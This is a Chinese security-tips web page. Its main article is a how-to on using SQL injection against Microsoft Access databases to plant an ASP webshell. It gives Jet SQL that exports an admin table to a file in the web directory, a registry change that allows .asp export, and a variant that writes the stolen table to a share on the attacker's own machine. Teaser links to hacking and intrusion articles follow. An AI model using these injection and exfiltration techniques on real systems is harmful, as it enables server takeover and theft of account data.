access教程 怎么利用access导出webshell?
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。
最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等格式)的方法:
SELECT * into [test.txt] in ’d:\web\’ ’text;’ from admin
执行上述语句,在d:\web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。
其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。
这个方法跟那个调用Access的Shell函数执行命令一样,要修改注册表,所以利用不是很大。
顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in ’\\yourip\share’ ’text;’ from admin
恶意程序:开发工具blackhole是怎么勒索的?
随着时代的发展,当代木马恶意软件的趋势并不仅仅是通过洪水般的广告让你电脑当机或者是偷取你的银行密码,而是会将你的电脑锁住,让你不能干任何事情,除非你交了“赎金”。最近流行的“勒索软件”首次发现是在a
详情2018-01-02 16:03:19责编:llp 来源:驱动管家samb的密码认证方式 为什么samb认证会泄露密码?
下面是SMB的密码认证方式。 WINDOWS的139口的访问过程,箭头表示数据方向: 1 客户端
详情2018-01-06 16:20:14责编:llp 来源:驱动管家phpwind论坛存在哪些漏洞?哪个漏洞最严重?
PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多
详情2018-01-13 13:59:36责编:llp 来源:驱动管家路由器的功能是什么?家用路由器有哪些功能?
通信部门允许每个宽带用户使用两台电脑共享上网,这用户自己需要加装一个宽带路由器。那么,应该购买什么样的路由器才比较合适呢?现在的宽带路由器不少功能对于一般家庭用户来说确实非常实用,可以提高很多网络
详情2018-01-07 12:43:34责编:llp 来源:驱动管家什么是rootkit病毒?rootkit病毒的类型及对应措施
Rootkits病毒主要分为两大类:第一种是进程注入式Rootkits,另一种是驱动级Rootkits。第一种Rootkits技术通常通过释放动态链接库(DLL)文件,并将它们注入到可执行文件及系统服务进程中运行,阻止操作系统及应用
详情2018-01-13 11:34:20责编:llp 来源:驱动管家面向目标ip发起ddos攻击的木马工具
DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的,词文章主要是针对那些对一种被大量肉鸡使用,面向目标IP发起DDoS攻击的木马工具。本篇文章是对一种被大量肉鸡使用,面向目标IP发起DDoS攻击
详情2018-01-04 11:13:04责编:llp 来源:驱动管家怎么查证你的浏览器存在ie漏洞?
JavaScript IE 6 漏洞 其利用代码如下: <script type= "text jscript "> function init() { document write( "The time is: " Date() ); } window onload = init; < script> 利用此代码可
详情2018-01-10 09:59:11责编:llp 来源:驱动管家局域网共享文件的软件:大势至局域网共享文件系统
大势至局域网共享文件权限管理系统专门用于管理和监控服务器共享文件,可以给不同用户、不同文件设置不同访问权限,包括新建、复制、修改、删除、剪切、重命名、另存、打印等,还可以详细记录用户对共享文件的操
详情2018-01-05 12:26:52责编:llp 来源:驱动管家dedecms教程 怎么防止dedecms广告里带php脚本并写入文件?
dedecms广告内容没有做限制,可以输入脚本信息,并写入文件,导致木马植入!此补丁,是防止广告里带PHP脚本并写入文件!核心代码:ad_js php复制代码代码如下: 禁止写入和PHP脚本有关字符信息 =================
详情2018-01-13 12:29:43责编:llp 来源:驱动管家哪些电脑容易被黑客入侵3389端口?防范黑客入侵3389端口的办法
你的ADSL用户名和密码不安全刚刚上网看了会儿新闻,和朋友聊了聊天。之后打游戏的时候,发现比平时要卡,不知道是什么原因,难道是网络问题吗?不管它了。听同事说美剧《英雄》不错,准备今天晚上不关机了,把它
详情2018-01-11 09:03:49责编:llp 来源:驱动管家
- 心脏出血漏洞修复教程 心脏出血怎么进行漏洞修复?
- PE系统不能正常安装SCSI驱动?试试这个方法
- 区域中找不到无线网络的提示是什么意思?找不到无线网络怎么办?
- 苹果版爱奇艺视频离线下载目录在哪儿?
- 购买电脑的外置声卡不知道买哪个好?外置声卡的介绍
- 华硕笔记本摄像头倒置有什么办法处理
- 淘宝竟被美国列入黑名单 阿里巴巴紧急发表声明
- 电脑安装了win7系统不知道怎么设置开机启动项
- 浏览器打不开网页的时候可以试下这样处理
- 红米note3手机如何装卡?红米note3手机装卡的注意事项
- ios 10值得更新吗?ios 10公测版的稳定性靠谱吗?
- 电脑开机密码设置方法是什么?电脑开机密码怎么设置?
- 笔记本电池怎么保养最好?笔记本电池保养方法盘点
- oracle数据库教程 电脑高手入侵oracle数据库有哪些常用的命令?
- 如何入侵redhat linux?入侵redhat linux的步骤
- 怎样使用qq截图?qq截图功能必须要登录qq吗?
- 爱奇艺视频首页自动播放怎么禁止?爱奇艺视频首页自动播放设置
- 华硕主板用这个办法可以快速开启虚拟化
- 三星平板电脑还可以这样去更换主题
- 在freebsd下怎么去创建一个安全的web服务器